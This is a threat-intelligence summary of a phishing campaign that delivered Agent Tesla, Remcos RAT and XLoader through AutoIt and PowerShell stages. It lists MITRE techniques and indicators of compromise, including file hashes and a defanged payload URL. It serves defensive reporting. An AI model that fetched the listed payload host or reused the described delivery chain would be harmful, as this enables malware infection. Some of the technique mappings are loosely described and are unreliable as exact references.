This article reveals a complex multi-layered attack chain discovered in December 2024, which utilizes malware such as Agent Tesla variants, Remcos RAT, and XLoader. The attackers utilize phishing emails and deceptive attachments to bypass security measures, employing tools like AutoIt and PowerShell for malware delivery and execution. Despite the sophistication of the attack, advanced detection systems like Palo Alto Networksβ Advanced WildFire effectively counter these threats. Affected: malware delivery, phishing, cybersecurity
Keypoints :
- An attack chain using multi-layered stages to deliver various malware types was uncovered.
- Phishing emails disguised as order requests were used to deliver malicious attachments.
- The campaign utilized AutoIt and PowerShell for executing the malware.
- Malicious files contained script-based malware and were designed to evade detection.
- Palo Alto Networksβ Advanced WildFire effectively detected and mitigated these attacks.
- Two primary types of payloads were deployed: .NET and AutoIt compiled executables.
- Detailed analysis of AutoIt scripts and debugging methods were explored in the article.
- Encapsulated malware focused on both resilience in attacks and simplicity in execution.
- Detection tools by Palo Alto Networks aid in identifying threats from known domains associated with the attack.
MITRE Techniques :
- T1071.001: Application Layer Protocol β PowerShell used to execute next-stage payloads.
- T1059.001: Command and Scripting Interpreter: Powershell β Utilized for downloading and executing malware.
- T1203: Exploitation for Client Execution β Delivery via phishing emails with malicious attachments.
- T1041: Exfiltration Over Command and Control Channel β Malware retrieves necessary payloads from remote servers.
- T1064: Scripting β The use of AutoIt scripts for final malware payload execution and injection into processes.
Indicator of Compromise :
- [SHA-256] 00dda3183f4cf850a07f31c776d306438b7ea408e7fb0fc2f3bdd6866e362ac5 β doc00290320092.7z
- [SHA-256] f4625b34ba131cafe5ac4081d3f1477838afc16fedc384aea4b785832bcdbfdd β doc00290320092.jse
- [SHA-256] d616aa11ee05d48bb085be1c9bad938a83524e1d40b3f111fa2696924ac004b2 β files.catbox[.]moe/rv94w8[.]ps1
- [SHA-256] 550f191396c9c2cbf09784f60faab836d4d1796c39d053d0a379afaca05f8ee8 β AutoIt compiled EXE for Agent Tesla variant
- [SHA-256] 61466657b14313134049e0c6215266ac1bb1d4aa3c07894f369848b939692c49 β doc00290320092.7z
Full Story: https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/